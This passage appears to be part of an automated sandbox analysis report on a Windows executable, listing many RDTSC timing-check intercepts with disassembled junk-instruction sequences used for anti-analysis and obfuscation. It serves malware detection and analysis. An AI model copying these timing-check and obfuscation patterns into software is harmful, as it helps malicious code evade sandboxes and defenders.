0x00000073 jmp 00007FC69CE9FC67h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D8299 second address: 5D829D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D829D second address: 5D836A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, ax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FC69CE9FC58h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jns 00007FC69CE9FC5Bh 0x00000034 jmp 00007FC69CE9FC60h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov dword ptr [ebp+122D5B72h], edi 0x00000046 mov eax, dword ptr [ebp+122D022Dh] 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007FC69CE9FC58h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 0000001Ah 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D2565h], esi 0x0000006c movzx edi, di 0x0000006f push FFFFFFFFh 0x00000071 jmp 00007FC69CE9FC69h 0x00000076 or bx, F5E1h 0x0000007b nop 0x0000007c pushad 0x0000007d jmp 00007FC69CE9FC68h 0x00000082 pushad 0x00000083 push eax 0x00000084 pop eax 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E20E4 second address: 5E20E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E20E8 second address: 5E210E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC69CE9FC68h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E210E second address: 5E2122 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC69CB9B4A6h 0x00000008 jnl 00007FC69CB9B4A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607E04 second address: 607E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607E08 second address: 607E20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC69CB9B4ABh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B16A second address: 60B16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B16E second address: 60B172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B172 second address: 60B18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007FC69CE9FC56h 0x00000010 jmp 00007FC69CE9FC5Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B18F second address: 60B194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 611875 second address: 611887 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610B96 second address: 610BAD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC69CB9B4AEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610BAD second address: 610BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610BB4 second address: 610BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610BBB second address: 610BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6112E3 second address: 6112E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6112E7 second address: 6112EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61143D second address: 611443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 611443 second address: 611447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616074 second address: 616085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC69CB9B4A6h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616332 second address: 616346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC5Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616346 second address: 616353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616353 second address: 61635B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61635B second address: 61635F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61635F second address: 616365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61662D second address: 616633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616633 second address: 616639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616639 second address: 61663E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616A3A second address: 616A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616A3E second address: 616A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FC69CB9B4A6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61B499 second address: 61B4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 ja 00007FC69CE9FC5Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61B4B2 second address: 61B4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6231C8 second address: 6231DE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CE9FC5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007FC69CE9FC56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6211EF second address: 6211F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC69CB9B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6211F9 second address: 621204 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62134E second address: 621352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 621352 second address: 62136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC69CE9FC5Bh 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622AD5 second address: 622AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622AD9 second address: 622ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622ADD second address: 622AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622AE3 second address: 622B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FC69CE9FC56h 0x0000000d jmp 00007FC69CE9FC65h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622DF6 second address: 622E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4ACh 0x00000009 jmp 00007FC69CB9B4AEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622E14 second address: 622E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007FC69CE9FC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007FC69CE9FCA4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC69CE9FC69h 0x0000001b jmp 00007FC69CE9FC69h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 628AB7 second address: 628AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC69CB9B4B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 628C7E second address: 628C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6290C0 second address: 6290C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 629200 second address: 62920C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007FC69CE9FC56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62920C second address: 629210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 629210 second address: 629233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69CE9FC5Ch 0x0000000e jmp 00007FC69CE9FC5Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6294E9 second address: 6294ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6294ED second address: 6294F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62E4F4 second address: 62E515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007FC69CB9B4A6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FC69CB9B4B0h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62E515 second address: 62E53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC69CE9FC5Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FC69CE9FC58h 0x00000013 jmp 00007FC69CE9FC5Dh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 56DB80 second address: 56DB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636332 second address: 636336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636336 second address: 63633A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636469 second address: 63648A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC69CE9FC5Ch 0x0000000f jmp 00007FC69CE9FC5Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636921 second address: 636927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636927 second address: 636949 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC69CE9FC64h 0x0000000c jbe 00007FC69CE9FC56h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636EAE second address: 636EB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 636EB3 second address: 636EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637022 second address: 63703A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FC69CB9B4ACh 0x0000000e js 00007FC69CB9B4A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 63703A second address: 637040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637040 second address: 637044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637044 second address: 637048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637048 second address: 637061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CB9B4AEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 637061 second address: 63706A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 63706A second address: 63706E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 63706E second address: 637072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 638079 second address: 63807F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 635E9B second address: 635EB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 js 00007FC69CE9FC60h 0x0000000d jmp 00007FC69CE9FC5Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647ECC second address: 647ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647ED5 second address: 647EDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647EDB second address: 647EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647EDF second address: 647EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 647EE3 second address: 647F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FC69CB9B4ACh 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FC69CB9B4B1h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 652C56 second address: 652C6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jmp 00007FC69CE9FC60h 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 662290 second address: 662299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 662299 second address: 6622F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jp 00007FC69CE9FC5Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FC69CE9FC6Ch 0x00000014 jmp 00007FC69CE9FC64h 0x00000019 push edx 0x0000001a pop edx 0x0000001b pushad 0x0000001c jmp 00007FC69CE9FC5Ah 0x00000021 jmp 00007FC69CE9FC65h 0x00000026 jmp 00007FC69CE9FC5Dh 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6686D3 second address: 6686EF instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC69CB9B4A6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FC69CB9B4AAh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6686EF second address: 6686F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668847 second address: 66884B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6689C3 second address: 6689F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC69CE9FC64h 0x00000008 js 00007FC69CE9FC56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FC69CE9FC5Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6689F8 second address: 6689FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6689FE second address: 668A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668A08 second address: 668A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668A0D second address: 668A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007FC69CE9FC56h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668A1F second address: 668A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668CE5 second address: 668CFB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007FC69CE9FC5Ch 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 668CFB second address: 668D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007FC69CB9B4A6h 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
